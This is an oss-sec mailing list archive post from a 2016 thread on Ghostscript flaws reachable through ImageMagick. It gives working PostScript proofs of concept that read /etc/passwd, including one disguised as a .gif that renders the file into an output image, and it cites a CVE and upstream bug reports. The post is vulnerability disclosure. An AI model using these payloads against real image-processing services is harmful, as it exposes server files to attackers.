oss-sec mailing list archives
Re: ImageMagick identify "d:" hangs
From: Tavis Ormandy <taviso () google com>
Date: Thu, 29 Sep 2016 14:28:28 -0700
On Thu, Sep 29, 2016 at 5:02 AM, Tavis Ormandy <taviso () google com> wrote:
On Wed, Sep 28, 2016 at 11:25 PM, Florian Weimer <fw () deneb enyo de> wrote:* Tavis Ormandy:Here is the code I'm testing with (Note: I really don't know much postscript - and I hate it). $ cat test.ps /dumpname { dup % copy filename dup % copy filename print % print filename (\n) print % print newline status % stat filename { (stat succeeded\n) print ( ctime:) print 64 string cvs print ( atime:) print 64 string cvs print ( size:) print 64 string cvs print ( blocks:) print 64 string cvs print (\n) print (\n) print }{ (unable to stat\n\n) print } ifelse .libfile % open as library { (.libfile returned file\n\n) print 64 string readstring pop % discard result (should proably test) print (\n) print }{ (.libfile returned string\n) print print (\n) print } ifelse } def (/etc/pass*) /dumpname load 256 string filenameforallfilenameforall was fixed as part of this: http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8 http://bugs.ghostscript.com/show_bug.cgi?id=694724 This also covers getenv and has already been assigned CVE-2013-5653.Thanks Florian, that explains it, although the distros do not appear to have picked that patch up.$ identify test.ps /etc/passwd stat succeeded ctime:1474998792 atime:1474998792 size:2662 blocks:8 .libfile returned file.libfile is not yet fixed upstream. I reported this upstream: http://bugs.ghostscript.com/show_bug.cgi?id=697169Thanks - seems like bad news for any automated image/document processing. Tavis.
Just for future reference, here is an example of dumping a file to an image processed with ImageMagick that works with gs 9.20: $ cat test.gif %!PS /Size 20 def % font/line size /Line 0 def % current line /Buf 1024 string def % line buffer /Path 0 newpath def /Courier-Bold findfont Size scalefont setfont 1 1 1 setrgbcolor clippath fill % draw white background 0 0 0 setrgbcolor % set black foreground (/etc/passwd) .libfile { { dup Buf readline { Path Line moveto show }{ showpage quit } ifelse % next line /Line Line Size add def } loop } if $ convert test.gif png:test.png
Current thread:
- Re: ImageMagick identify "d:" hangs, (continued)
- Re: ImageMagick identify "d:" hangs Jakub Wilk (Sep 27)
- Re: ImageMagick identify "d:" hangs Bob Friesenhahn (Sep 27)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 28)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 28)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 28)
- Re: ImageMagick identify "d:" hangs Bob Friesenhahn (Sep 28)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 28)
- Re: ImageMagick identify "d:" hangs Florian Weimer (Sep 28)
- Re: ImageMagick identify "d:" hangs Bob Friesenhahn (Sep 27)
- Re: ImageMagick identify "d:" hangs Jakub Wilk (Sep 27)
- Re: ImageMagick identify "d:" hangs Florian Weimer (Sep 28)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 29)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 29)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 30)
- Re: ImageMagick identify "d:" hangs Florian Weimer (Sep 30)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 30)